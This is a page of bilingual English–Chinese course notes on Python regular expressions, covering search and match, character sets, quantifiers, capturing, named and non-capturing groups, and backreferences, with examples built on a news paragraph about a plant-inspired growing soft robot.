    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    . the dot matches any character except the newline. 点匹配除换行符以外的任何字符。

    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
    re.search('.+', string).group()  # no new line
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
    re.search('.+', string, flags = re.DOTALL).group()
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    Creating your own character sets

    '-' is a metacharacter when used in [] (custom character sets), e.g. [A-Z]. '-' 在 [](自定义字符集)中使用时是一个元字符

    string = 'Hello, There, How, Are, You'
    re.findall('[A-Z]', string)  # pulls out all capital letters 取出所有大写字母
    ['H', 'T', 'H', 'A', 'Y']
    re.findall('[A-Z,]', string)
    # here we search for any capital letters or a comma
    # 这里我们搜索大写字母或逗号
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Z,.]', string) # inside [], . is a literal dot, not the "any non-newline character" wildcard described earlier
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Za-z,\s.]', string) # uppercase letters, lowercase letters, comma, whitespace, period
    ['H', 'e', 'l', 'l', 'o', ',', ' ', 'T', 'h', 'e', 'r', 'e', ',', ' ', 'H', 'o', 'w', ',', ' ', 'A', 'r', 'e', ',', ' ', 'Y', 'o', 'u', '.', '.', '.']

    Quantifiers with custom sets

    import re
    • + matches one or more occurrences
    • ? matches zero or one occurrence
    • * matches zero or more occurrences
    • {} matches a custom number of occurrences
    string = 'HELLO, There, How, Are, You...'
    re.search('[A-Z]+', string)
    <re.Match object; span=(0, 5), match='HELLO'>
    re.findall('[A-Z]+', string)
    ['HELLO', 'T', 'H', 'A', 'Y']
    re.findall('[A-Z]{2,}', string)  # 2 or more
    ['HELLO']
    # one or more of 4 types of characters
    # 四种字符中的一种或多种
    re.search('[A-Za-z\s,]+', string).group()
    'HELLO, There, How, Are, You'
    re.findall('[A-Z]?[a-z\s,]+', string)
    ['O, ', 'There, ', 'How, ', 'Are, ', 'You']
    # ^ is a metacharacter within brackets
    # ^是括号中的元字符
    # i.e. negation: match anything NOT in the set
    re.search('[^A-Za-z\s,]+', string).group()
    '...'
    re.findall('[^A-Z]+', string) # match all runs of non-uppercase characters
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']

    GROUPS

    • groups allow us to pull out sections of a match and store them
      • groups 允许我们提取匹配的部分并存储它们
    # contrived example 举例
    import re
    string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
    re.findall('[A-Za-z]+ \w+ \d+ \w+', string)
    ['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
    • the use of parentheses denotes a group 使用括号表示一个组
      • () = metacharacter 元字符
    re.findall('([A-Za-z]+) \w+ \d+ \w+', string) # to pull out just the names 只把名字取出来
    ['John', 'Susan', 'Mike']
    re.findall('[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out animals 取出所有动物
    ['cats', 'dogs', 'fishes']
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    # use original string to make sure matching is correct, then use groups to pull out the info you want
    # 使用原始字符串确保匹配是正确的,然后使用组拉出你想要的信息
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    # organize the data by data-types 按数据类型组织数据
    info = re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]

    Python 3's zip() function

    • The zip() function takes iterables as arguments, packs their corresponding elements into tuples, and returns an object made up of those tuples, which saves a good amount of memory.
    • Conversely, zip(*) can be understood as unzipping: it returns the transposed, matrix-like view.
    list(zip(*info))  # organize your data by categories 按类别组织数据
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
    match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups 抽出三组
    match
    <re.Match object; span=(0, 15), match='John has 6 cats'>
    match.group(0)
    'John has 6 cats'
    match.groups()
    ('John', '6', 'cats')
    match.group(1)
    'John'
    match.group(2)
    '6'
    match.group(3)
    'cats'
    match.group(1, 3)  # multiple groups 多个组
    ('John', 'cats')
    match.group(3, 2, 1, 1)  # change the order 改变顺序
    ('cats', '6', 'John', 'John')
    match.span()
    (0, 15)
    match.span(2)
    (9, 10)
    match.span(3)
    (11, 15)
    match.start(3)
    11
    # find all has no group function
    # re.findall 没有 group 函数
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    ---------------------------------------------------------------------------
    AttributeError                            Traceback (most recent call last)
    AttributeError: 'list' object has no attribute 'group'
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    ('John', '6', 'cats')
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # this doesn't work either 这也不好使
    ---------------------------------------------------------------------------
    AttributeError                            Traceback (most recent call last)
    AttributeError: 'tuple' object has no attribute 'group'
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # a group inside a group 组中组
    data
    [('John has 6 cats', 'John', '6', 'cats'), ('Susan has 3 dogs', 'Susan', '3', 'dogs'), ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
    # the only workaround is to iterate and index into the tuples 你只能这么干
    for i in data:
        print(i[3])
    cats
    dogs
    fishes
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    next(it).groups()
    ('John', '6', 'cats')
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
        print(element.group(1, 3, 2)) # don't forget iterators exhaust
    ('John', 'cats', '6')
    ('Susan', 'dogs', '3')
    ('Mike', 'fishes', '8')
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
        print(element.group())
    John has 6 cats
    Susan has 3 dogs
    Mike has 8 fishes
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
        print(element.groups())
    ('John', '6', 'cats')
    ('Susan', '3', 'dogs')
    ('Mike', '8', 'fishes')

    Naming Groups

    import re
    string = 'New York, New York 11369'
    • ([A-Za-z\s]+) the city
    • ([A-Za-z\s]+) the state
    • (\d+) the ZIP code
    match = re.search('([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
    match.group(1), match.group(2), match.group(3), match.group(0)
    ('New York', ' New York ', '11369', 'New York, New York 11369')

    ?P< > names a group: the group name goes inside the <>, followed by the RE for the group

    • (?P<City>)
    • (?P<State>)
    • (?P<ZipCode>)
    pattern = re.compile('(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
    match = re.search(pattern, string)
    match.group('City'), match.group('State'), match.group('ZipCode')
    ('New York', ' New York ', '11369')
    match.group(1)
    'New York'
    match.groups()
    ('New York', ' New York ', '11369')
    # Just in case you forget the names of the groups you used
    # 以防您忘记了您使用的组的名称
    match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}

    Quantifiers on groups

    • Using quantifiers on groups has some nuances, but very useful
      • 在组上使用量词有一些细微差别,但非常有用
    import re
    string = 'abababababab'  # ab repeated many times
    re.search('(ab)+', string) #(ab)+ is many instances of one group repeated 同一组的许多实例重复出现
    <re.Match object; span=(0, 12), match='abababababab'>
    string = 'abababababab'  # ab repeated many times 重复了很多次

    re.search('[ab]+', string) # this is different
    <re.Match object; span=(0, 12), match='abababababab'>
    • difference explained below
      • (ab) means "a followed by b" as one unit
      • [ab] means "a or b"
    string = 'abababbbbbbb'  # only partial fit to our new string 只有部分符合我们的新字符串
    re.search('(ab)+', string)
    <re.Match object; span=(0, 6), match='ababab'>
    string = 'abababbbbbbb'  # but this pattern fits perfectly 但这个模式完全吻合
    re.search('[ab]+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    string = 'abababbbbbbb'  # allows flexibility 允许的灵活性
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    string = 'abababsssss'  # allows flexibility
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 11), match='abababsssss'>

    Nuances to be wary of

    需要注意的细微差别

    # only one group not multiple groups 只有一个组而不是多个组
    string = 'abababababab' # original string
    match = re.search('(ab)+', string)

    match.group(1)
    # capturing only one group; value is overwritten each time
    # 只捕获一个群体; 值每次都会被覆盖
    'ab'
    match.group(2) # no value 没有值
    ---------------------------------------------------------------------------
    IndexError                                Traceback (most recent call last)
    IndexError: no such group
    match.groups()  # only one group, group just overwritten 只有一个组,组被覆盖了
    ('ab',)
    match.group(0) # the full match, not related to groups 完全匹配,与组无关
    'abababababab'
    • Another simple example with two groups using quantifiers
      • 另一个使用量词的两个组的简单例子
    string = 'ababababab'
    match = re.search ('(ab)+(ab)+', string)
    match
    <re.Match object; span=(0, 10), match='ababababab'>
    match.groups()
    ('ab', 'ab')
    match.span(2) # the first group is greedy
    (8, 10)
    • Only one group captured
      • 只捕获了一个群体
    string = '123456789'

    match = re.search('(\d)+', string)
    match
    <re.Match object; span=(0, 9), match='123456789'>
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    ('9',)

    Quantifiers with groups within findall

    在 findall 中包含组的量词

    string = '123456789'

    re.findall('(\d)+', string)
    # only pulls out group and last instance
    # 只取出组和最后一个实例
    ['9']
    string = '1234 56789'
    re.findall('(\d)+', string)
    # Here we have two matches 匹配了两个
    ['4', '9']
    re.findall('((\d)+)', string)[1][0] 
    # to find full match create a main group engulfing the smaller groups
    # 要找到完全匹配,创建一个主组,吞噬较小的组
    '56789'
    # another example
    string = 'abbbbb ababababab'
    re.findall('(ab)+', string) # two instances
    ['ab', 'ab']
    string  = 'abbbbb ababababab'
    re.findall('((ab)+)', string) #full match
    [('ab', 'ab'), ('ababababab', 'ab')]

    Groups for word completion

    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
    <re.Match object; span=(0, 14), match='Happy Birthday'>
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>
    re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>

    Non-capture Groups

    # Here is one such example:
    import re

    string = '1234 56789'
    re.findall('(\d)+', string)
    ['4', '9']
    re.search('(\d)+', string).groups()  #using search
    ('4',)

    A capturing group is a way of treating multiple characters as a single unit. You create one by wrapping characters in parentheses; for example, the regular expression (dog) creates a group containing the letters "d", "o", and "g". The part of the input string that matches the capturing group is saved in memory so it can be reused later via a backreference.

    With a non-capturing group, the part of the input string that matches the group is not saved in memory.

    • non-capture group syntax
      • ?: marks a non-capture group, and looks slightly similar to the syntax for naming groups
        • 上面的符号表示非捕获组,看起来有点类似于命名组的语法
      • ?P names groups; please don't confuse the two
        • 请不要混淆这两者
    # comparison 比较
    re.findall('(\d)+', string)
    ['4', '9']
    re.findall('(?:\d)+', string)  # with non capture group 非捕获组
    ['1234', '56789']
    • So the group is part of the pattern, but we don’t output the groups’ results
      • 所以 group 是模式的一部分,但我们不输出 group 的结果
    re.findall('\d+', string)
    # when RE has no groups in findall, we output entire match
    # 当 RE 在 findall 中没有组时,我们输出整个匹配
    ['1234', '56789']
    # Another example
    string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,' 
    # We want to pull out all names whose ID has 123 within it
    # 我们要取出所有 ID 包含 123 的名字
    re.findall('(?:123)+ = (\w+),', string)  # three instances
    ['Alex', 'Danny', 'Mike']
    # Another example
    string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
    re.findall('(?:1\*){2,}\d+', string)
    ['1*1*1*1*22222', '1*1*3333']
    • Now, non-captured groups don't just affect the findall method
    • it also affects the search and match methods
      • 现在,未捕获的组不仅影响 findall 方法——它还影响搜索和匹配方法

    BE CAREFUL WITH SYNTAX

    • ?: correct!
    • :? incorrect!
    string = '1234 56789'
    match = re.search('(?:\d)+', string) # correct syntax
    print(match.groups())
    ()
    string = '1234 56789'
    match = re.search('(:?\d)+', string) # :? is incorrect: this is just a capturing group matching an optional ':' then a digit
    print(match.groups())
    ('4',)

    Summary:

    • when we capture groups, we are either storing the values or outputting them.
      • 当我们捕获组时,我们要么存储值,要么输出值。

    Backreferences - Using captured groups inside other operations

    反向引用——在其他操作中使用捕获的组

    • backreferencing means making a reference to a captured group within the same regular expression
      • 反向引用是在同一个正则表达式中引用捕获的组
    # syntax and example
    re.search(r'(\w+) \1','Merry Merry Christmas')  # Looking for repeated words 寻找重复的单词
    <re.Match object; span=(0, 11), match='Merry Merry'>
    re.search(r'(\w+) \1','Merry Merry Christmas').groups()
    ('Merry',)

    \1 is just referencing the first group within the regular expression

    '\1' matches whatever the 1st parenthesized group captured. For example, '(\d)\1' matches two consecutive identical digit characters, such as the 33 in 33aa.
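    A quick check of that behavior (my own example, not from the video):

    re.search(r'(\d)\1', '33aa')  # the same digit twice in a row
    <re.Match object; span=(0, 2), match='33'>
    re.search(r'(\d)\1', '34aa')  # returns None: 3 and 4 are different digits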

    # Another example
    re.findall(r'(\w+)','Happy Happy Holidays. Merry Christmas Christmas')
    ['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']
    re.findall(r'(\w+) \1','Happy Happy Holidays. Merry Christmas Christmas')   # Want to look for repeated words 想要寻找重复的单词
    ['Happy', 'Christmas']
    # another example
    re.findall(r'(\w+) \1','Merry Merry Christmas Christmas Merry Merry Christmas')
    ['Merry', 'Christmas', 'Merry']
    ]]>
    + Resources
    • Python Regular Expressions - part #1 - YouTube

    • Regular Expressions are used to match string patterns. 正则表达式用于匹配字符串模式。

      • They are very powerful 它们非常强大

      • If you want to pull out a string pattern RE can do it 如果你想拉出一个字符串模式正则可以做到

      • They may seem intimidating 他们可能看起来很吓人

    Course notes

    Things to note

    • The first thing I want to start off with is the backslash character

      • 我想要开始的第一件事是反斜杠字符
    • Very confusing to people

      • 很让人困惑
    • Python uses back slash to indicate special characters

      • Python 使用反斜杠表示特殊字符
    • '\n' Backslash followed by n denotes a newline

      • 反斜杠后面加 n 表示换行符
    • '\t' denotes a tab

      • ‘\t’ 表示制表符
    • The 'r' prefix, which disables Python's special-character escapes

      • 'r’表达式,将使 Python 的特殊字符无效
    • r'\n' means it's a raw string with two characters, '\' and 'n', as opposed to just one special character

      • r'\n' 表示它是一个有两个字符 '\' 和 'n' 的原始字符串,而不是只有一个特殊字符
    • Let's see some examples of this; don't mind the Python syntax

      • 让我们看一些这样的例子,不要介意 python 语法

    How do you use re.search() in Python regular expressions?

    re.search(pattern, string, flags =0)

    import re
    re.search('n', '\n') # first item is pattern, second item is string
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
    """
    there are some nuances that you should be aware of: regular expressions
    have their own special characters as well; regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    Common RE methods - Match and Search

    • searches anywhere in the sentence 搜索句子中的任何位置
    • flags: special options 标志:特殊选项

    re.search(pattern, string, flags)

    • only beginning of the string 只搜索字符串的开始

    re.match(pattern, string, flags)

    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    False
    bool(re.match("a", "abcdef"))  # match returns true
    True
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    <re.Match object; span=(6, 7), match='c'>
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    (re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>

    re.match().group(num=0) in Python regex matching

    re.match("a", "abcdef").group()  # string output # default value is 0 默认值为 0
    'a'
    re.match("a", "abcdef").group(0)  
    'a'
    re.search("n", "abcdefnc abcd").group()
    'n'
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    'nc abcd'

    Python regex (2): the group/start/end/span methods

    re.search("c", "abdef\nc").start()
    6
    re.search("c", "abdef\nc").end()
    7

    Literal matching

    re.search('na',"abcdefnc abcd" )  # returns None: the characters must appear in order, and 'na' never occurs 无效,因为它们是有序的
    re.search('n|a',"abcdefnc abcda" )  # n or a
    <re.Match object; span=(0, 1), match='a'>
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    <re.Match object; span=(5, 6), match='n'>
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    <re.Match object; span=(0, 1), match='b'>

    re.findall

    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    ['n', 'a', 'a']
    1
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    <re.Match object; span=(0, 4), match='abcd'>
    1
    re.findall('abcd',"abcdefnc abcd" ) 
    ['abcd', 'abcd']

CHARACTER SETS

• Character sets can match a set of characters
  • They simplify regular expressions

import re
re.search('abcd', "abcdefnc abcd")  # earlier code
<re.Match object; span=(0, 4), match='abcd'>
re.search(r'\w\w\w\w', "abcdefnc abcd")  # matches letters and numbers
# alphanumeric characters
<re.Match object; span=(0, 4), match='abcd'>

\w matches alphanumeric characters [a-zA-Z0-9_]

re.search(r'\w\w\w\w', "ab_cdefnc abcd")  # also matches the _ character
<re.Match object; span=(0, 4), match='ab_c'>
re.search(r'\w\w\w', "a3.!-!")  # no match: symbols are excluded, only letters, digits and _
re.search(r'\w\w\w', "a33-_!").group()
'a33'

\W is the opposite of \w;

it matches anything not included in [a-zA-Z0-9_]

re.search(r'\w\w\W', "a3.-_!")  # \W matches anything that is not a letter, digit or _
<re.Match object; span=(0, 3), match='a3.'>
re.search(r'\w\w\W', "a3 .-_!")  # \W matches whitespace as well
<re.Match object; span=(0, 3), match='a3 '>

We will go over other character sets later on

Let's go over quantifiers

• quantifiers
  • '+' = 1 or more
  • '?' = 0 or 1
  • '*' = 0 or more
  • '{n,m}' = n to m repetitions; {,m} and {n,} leave one bound open
re.search(r'\w\w', "abcdefnc abcd")
<re.Match object; span=(0, 2), match='ab'>
re.search(r'\w+', "abcdefnc abcd").group()  # when we don't know the number of letters
'abcdefnc'
re.search(r'\w+\W+\w+', "abcdefnc abcd").group()
'abcdefnc abcd'
re.search(r'\w+\W+\w+', "abcdefnc       abcd").group()  # added spaces
'abcdefnc       abcd'
re.search(r'\w+\W?\w+', "abcdefnabcd").group()  # ? = 0 or 1 instances
'abcdefnabcd'
re.search(r'\w+\W?\w+', "abcde fnabcd").group()
'abcde fnabcd'
re.search(r'\w+\W+\w+', "abcdefnabcd")  # no match: \W+ needs at least one non-word character
• Pulling out specific amounts
re.search(r'\w{3}', 'aaaaaaaaaaa')  # exactly 3 \w characters
<re.Match object; span=(0, 3), match='aaa'>
re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  # 1 is the minimum, 4 the maximum
'aaaa'
re.search(r'\w{1,10}\W{0,4}\w+', "abcdefnc abcd").group()
# 1-10 \w characters,
# 0-4 \W characters,
# 1+ \w characters
'abcdefnc abcd'
re.search(r'\w{1,}\W{0,}\w+', "abcdefnc abcd").group()  # at least 1, at least 0, 1+
'abcdefnc abcd'
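The open-ended forms from the list above, {,m} and {n,}, follow the same pattern; a quick sketch on a made-up string, with outputs as comments:

re.search(r'a{,3}', 'aaaaa').group()  # 'aaa': up to 3 repetitions
re.search(r'a{3,}', 'aaaaa').group()  # 'aaaaa': 3 or more repetitions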

Other types of character sets

'\d' = matches digits [0-9]

'\D' = matches any non-digit character; the opposite of \d

import re
string = '23abced++'
re.search(r'\d+', string).group()
    '23'
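For symmetry, a minimal sketch of \D on the same string, output shown as a comment:

re.search(r'\D+', string).group()  # 'abced++', the first run of non-digits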

'\s' = matches any whitespace character: newlines, tabs, spaces etc.

'\S' = matches any non-whitespace character; the opposite of \s

string = '23abced++'
re.search(r'\S+', string).group()  # no whitespace in the string, so everything matches
    '23abced++'
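And a quick sketch of \s itself, on a small made-up string:

re.findall(r'\s', 'a b\tc\nd')  # [' ', '\t', '\n']: one space, one tab, one newline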
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
re.findall(r'\S+', string)  # returns every "word" in string
    ['Robots', 'are', 'branching', 'out.', 'A', 'new', 'prototype', 'soft', 'robot', 'takes', 'inspiration', 'from', 'plants', 'by', 'growing', 'to', 'explore', 'its', 'environment.', 'Vines', 'and', 'some', 'fungi', 'extend', 'from', 'their', 'tips', 'to', 'explore', 'their', 'surroundings.', 'Elliot', 'Hawkes', 'of', 'the', 'University', 'of', 'California', 'in', 'Santa', 'Barbara', 'and', 'his', 'colleagues', 'designed', 'a', 'bot', 'that', 'works', 'on', 'similar', 'principles.', 'Its', 'mechanical', 'body', 'sits', 'inside', 'a', 'plastic', 'tube', 'reel', 'that', 'extends', 'through', 'pressurized', 'inflation,', 'a', 'method', 'that', 'some', 'invertebrates', 'like', 'peanut', 'worms', '(Sipunculus', 'nudus)', 'also', 'use', 'to', 'extend', 'their', 'appendages.', 'The', 'plastic', 'tubing', 'has', 'two', 'compartments,', 'and', 'inflating', 'one', 'side', 'or', 'the', 'other', 'changes', 'the', 'extension', 'direction.', 'A', 'camera', 'sensor', 'at', 'the', 'tip', 'alerts', 'the', 'bot', 'when', 'it’s', 'about', 'to', 'run', 'into', 'something.', 'In', 'the', 'lab,', 'Hawkes', 'and', 'his', 'colleagues', 'programmed', 'the', 'robot', 'to', 'form', '3-D', 'structures', 'such', 'as', 'a', 'radio', 'antenna,', 'turn', 'off', 'a', 'valve,', 'navigate', 'a', 'maze,', 'swim', 'through', 'glue,', 'act', 'as', 'a', 'fire', 'extinguisher,', 'squeeze', 'through', 'tight', 'gaps,', 'shimmy', 'through', 'fly', 'paper', 'and', 'slither', 'across', 'a', 'bed', 'of', 'nails.', 'The', 'soft', 'bot', 'can', 'extend', 'up', 'to', '72', 'meters,', 'and', 'unlike', 'plants,', 'it', 'can', 'grow', 'at', 'a', 'speed', 'of', '10', 'meters', 'per', 'second,', 'the', 'team', 'reports', 'July', '19', 'in', 'Science', 'Robotics.', 'The', 'design', 'could', 'serve', 'as', 'a', 'model', 'for', 'building', 'robots', 'that', 'can', 'traverse', 'constrained', 'environments', 'This', 'isn’t', 'the', 'first', 'robot', 'to', 'take', 'inspiration', 'from', 'plants.', 'One', 'plantlike', 'predecessor', 'was', 'a', 'robot', 'modeled', 'on', 'roots.']
' '.join(re.findall(r'\S+', string))
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

. the dot matches any character except the newline.

    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
re.search('.+', string).group()  # stops at the first newline
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
re.search('.+', string, flags=re.DOTALL).group()  # re.DOTALL lets . match newlines too
